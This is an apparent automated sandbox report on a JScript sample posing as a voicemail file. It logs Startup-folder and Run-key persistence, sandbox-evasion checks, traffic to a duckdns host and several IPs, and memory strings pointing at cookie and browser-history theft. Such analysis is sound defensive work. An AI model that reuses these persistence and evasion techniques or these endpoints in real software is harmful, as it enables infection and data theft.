Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\unarchiver.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_069CF82C push es; iretd	11_2_069CF838
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_069CE958 push 81069CE9h; retf	11_2_069CE95D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_069CDC73 push es; retf	11_2_069CDCA4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_069CDC67 push es; retf	11_2_069CDCA4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 12_2_0615F727 push es; iretd	12_2_0615F728
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 12_2_06BFF399 push edi; retf	12_2_06BFF39A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 12_2_06BFF88F push es; iretd	12_2_06BFF890
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 12_2_06BFF3E9 push edi; retf	12_2_06BFF3EA
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 12_2_06BFF955 push cs; retf 0006h	12_2_06BFF956

Boot Survival

Drops script or batch files to the startup folder

Source: C:\Windows\SysWOW64\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\New Voicemail May 9 _mp4.js

Jump to dropped file

Source: C:\Windows\SysWOW64\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\New Voicemail May 9 _mp4.js

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\New Voicemail May 9 _mp4.js

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run New Voicemail May 9 _mp4	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run New Voicemail May 9 _mp4	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run New Voicemail May 9 _mp4	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run New Voicemail May 9 _mp4	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 8426

Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Windows\SysWOW64\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk

Source: C:\Windows\SysWOW64\unarchiver.exe	Memory allocated: 1440000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Memory allocated: 3140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Memory allocated: 5140000 memory commit \| memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe TID: 3244	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 6360	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 2304	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe

Code function: 6_2_011AB1D6 GetSystemInfo,

6_2_011AB1D6

Source: C:\Windows\SysWOW64\unarchiver.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: wscript.exe, 00000011.00000002.3661280933.000002101103B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp/
Source: wscript.exe, 0000000B.00000003.2093298186.00000000032FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2093476765.0000000003302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2095486810.000000000331F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2093647514.000000000331E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2091854276.00000000032F6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWV
Source: wscript.exe, 00000011.00000002.3661280933.000002101103B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%\system32\NgcRecovery.dll,-100l
Source: wscript.exe, 0000000B.00000002.2095486810.0000000003370000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2091854276.0000000003370000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2093298186.00000000032FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2093298186.0000000003370000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2093476765.0000000003302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2095486810.000000000331F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2093647514.000000000331E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2091854276.00000000032F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3661089635.0000000003605000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3663596969.0000000006C0B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000002.3663058891.00000210139EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003605000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWC

Source: C:\Windows\SysWOW64\unarchiver.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 45.133.174.75 8426	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 149.154.167.220 443	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 208.95.112.1 80	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 104.21.25.148 443	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 172.67.19.24 443	Jump to behavior

Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rwinmgmts:\\localhost\root\securitycenter2l32.dl	memstr_3549122d-c
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ip-api.comuser\appdata\roaming\microsoft\windows\recent	memstr_cf1a58e5-6
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ylngkwrhs\user\appdata\roaming\microsoft\windows\recent	memstr_1684d5b5-f
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: masterokrwh.duckdns.org	memstr_5de80bd1-b
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user\appdata\roaming\microsoft\windows\templates	memstr_eeac09f9-9
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {su0	memstr_900f3e88-d
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $vjv	memstr_da91cda7-9
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.6x962p239v3ecdhcryptoidinfoeccparameters	memstr_c0406ecc-0
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: uvyv!	memstr_6ffd4a39-5
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cookie:sers\user\appdata\local\microsoft\windows\inetcookiesbv(v"	memstr_1080e65f-c
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: contentsv7v#	memstr_443aeac8-5
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: json.geoiplookup.io`v	memstr_479e338b-d
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user\appdata\local\microsoft\windows\inetcache\ie	memstr_5711b43d-1
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: io.geoiplookup	memstr_be5b595b-a
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user\appdata\local\microsoft\windows\inetcache\ie\	memstr_c0ebe165-7
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user\appdata\local\microsoft\windows\inetcookies\	memstr_aa6c5c4d-d
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: org.duckdns.masterokrwhns.org/p\new voicemail may 9 _mp4.js	memstr_e277ad85-c
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.7x962p256v1ecdsacryptoidinfoeccparameters	memstr_96d1a871-9
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: history\user\appdata\local\microsoft\windows\inetcache\ie	memstr_1d7a5096-f
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wmw-	memstr_1b4833a7-4
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.7x962p256v1ecdhcryptoidinfoeccparameters	memstr_2624004a-3
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6w\|w.	memstr_2649b768-c
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: visited:'wkw/	memstr_adc43f0a-8
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: twzw0	memstr_2d528b3d-f
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: contentew)w1	memstr_a9d0ad20-6
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rw8w2	memstr_0ee4330e-1
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: =9ncalrpc:[epmapper,security=impersonation dynamic false]	memstr_3743c8f7-0
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cookies	memstr_9af5d4c6-6
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eux;f	memstr_a028d1bd-d
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eux>f	memstr_c3eedfc6-8
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: euh?f	memstr_f3be9349-5
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fuh<f	memstr_2aa7ce9a-6
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fu`kf	memstr_9204683f-f
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: euh>f	memstr_c6d35956-7
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eu(@f	memstr_040c0274-8
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eu0fg	memstr_36399421-6
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eu@eg	memstr_432fb1d5-5
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: euh;f	memstr_bbff0f44-5
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eu8<f	memstr_c4c8f32c-4
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fupii	memstr_a4917cb7-a
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fuhdg	memstr_fba95c9e-7
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fu ii	memstr_d973f5b7-c
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eu$fu ii	memstr_d6beb595-4
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eu$0fu	memstr_fab5e55e-7
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eu$dfu	memstr_d1698f07-7
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eupfi	memstr_35d4c720-d
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: `fup	memstr_cd23c6ce-7
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eu$`fup	memstr_ed9df928-5
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eu$xfu	memstr_c6989d34-4
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eupji	memstr_3c8fd28a-7
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fupgi	memstr_ad850b50-8
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qjgzx\|t	memstr_58e944cb-5
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 9uxut	memstr_73eee9ff-3
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: spxrt	memstr_4871d8a5-3
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kx+t	memstr_8efbd488-2
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: spcrelaxedpemarkercheck	memstr_c068f7e1-7
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft time stamping:y	memstr_7d21ca27-0
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dynamic code generator5y	memstr_c8695fb8-5
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ,ynut$	memstr_037153fb-5
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: all issuance policies,ynut$	memstr_44841c69-b
